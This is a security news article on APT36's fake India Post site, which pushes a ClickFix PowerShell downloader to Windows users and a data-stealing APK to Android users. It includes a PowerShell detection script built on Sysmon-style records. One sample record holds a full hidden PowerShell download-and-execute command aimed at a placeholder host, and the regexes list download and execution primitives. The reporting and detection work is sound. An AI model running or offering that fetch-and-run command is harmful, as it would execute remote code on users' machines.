APT36 mimics the India Post website to launch malware

April 1, 2025

APT36, an advanced persistent threat group linked to Pakistan, has allegedly created a fake India Post website to infect Indian Windows and Android users.

Researchers attribute the newly discovered campaign to the APT group, also known as Transparent Tribe. The bogus website impersonating India Post is called “postindia[.]site.”

Users who visit the malicious site from Windows are instructed to download a PDF document, while those who visit from an Android device are redirected to a malicious Android app package.

When accessed from a desktop, the site serves a malicious PDF that uses the ‘ClickFix’ tactic: a prompt directs the user to press Win + R, paste a supplied PowerShell command into the Run dialog, and execute it, potentially compromising the machine.


The fake India Post website was registered in November last year.


Investigations show that the domain impersonating India Post was registered around November 20, 2024. Once executed, the pasted PowerShell command acts as a downloader, fetching a next-stage payload from a remote server that is inactive.
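The ClickFix chain described above ends with PowerShell being launched from the Run dialog to fetch a second stage, which is a pattern process-creation telemetry can catch. The following is an added example, not code from the original report or from the researchers who analysed the campaign: it scores constructed Sysmon-style process-creation records (hypothetical values, placeholder hostname) for an explorer.exe-spawned PowerShell whose command line carries a download-and-execute primitive.

```python
import re

# Constructed sample records modelled on Sysmon Event ID 1 (process creation) fields; hostname is a placeholder.
SAMPLE_EVENTS = [
    {   # ClickFix-style: Run dialog (explorer.exe) -> hidden PowerShell download-and-execute
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -nop -c "iex (iwr http://postindia.invalid/stage2 -UseBasicParsing)"',
    },
    {   # Benign admin script launched from a command prompt
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # Harmless one-liner typed into the Run dialog: an explorer.exe parent alone is not enough
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command Get-Date",
    },
]

# Indicators are weighted so the full ClickFix chain clears the threshold but a lone flag does not.
DOWNLOAD_RE = re.compile(r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|"
                         r"start-bitstransfer|net\.webclient|invoke-restmethod|irm)\b")
EXECUTE_RE = re.compile(r"(?i)(?:\biex\b|\binvoke-expression\b|\bstart-process\b|(?<!\w)-e(?:nc|ncodedcommand)?(?!\w))")
EVASION_RE = re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|ep\s+bypass|executionpolicy\s+bypass)")
ALERT_THRESHOLD = 5

def score_event(ev: dict) -> dict:
    """Score one process-creation record; returns the score, matched indicators and an alert flag."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    hits, score = [], 0
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"score": 0, "indicators": [], "alert": False}
    # Win+R spawns the process from explorer.exe, unlike scripts started by cmd, schedulers or RMM tools
    if parent.endswith("explorer.exe"):
        hits.append("explorer_parent"); score += 2
    if DOWNLOAD_RE.search(cmd):
        hits.append("download_primitive"); score += 2
    if EXECUTE_RE.search(cmd):
        hits.append("execute_primitive"); score += 2
    if EVASION_RE.search(cmd):
        hits.append("evasion_flag"); score += 1
    return {"score": score, "indicators": hits, "alert": score >= ALERT_THRESHOLD}

def scan(events: list) -> list:
    """Return the indices of records that meet the alert threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)["alert"]]
```

The third record shows why the rule keys on the combination rather than the Run-dialog parent alone: a user typing a harmless command after Win + R produces the same parent-child pair.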

When the same site is visited from an Android device, it prompts the user to install the site's mobile app for a “better experience.” Once installed, the app requests risky permissions that allow it to harvest and exfiltrate sensitive data such as contact lists, current location, and files from external storage.

In addition, the Android application changes its icon to resemble an innocuous Google Accounts icon to conceal its presence, making it harder for the user to notice and uninstall the software. The app also includes a function that repeats the permission request if the user denies it the first time.

The malicious program is also designed to run in the background indefinitely, even after a device restart, and explicitly requests permission to be exempted from battery optimisation.

Hackers, scammers, and APT groups are increasingly adopting the ClickFix tactic, and researchers continue to observe a surge in such activity across the threat landscape.

This developing technique is a major concern because it works against both naive and tech-savvy users who are not yet familiar with it.
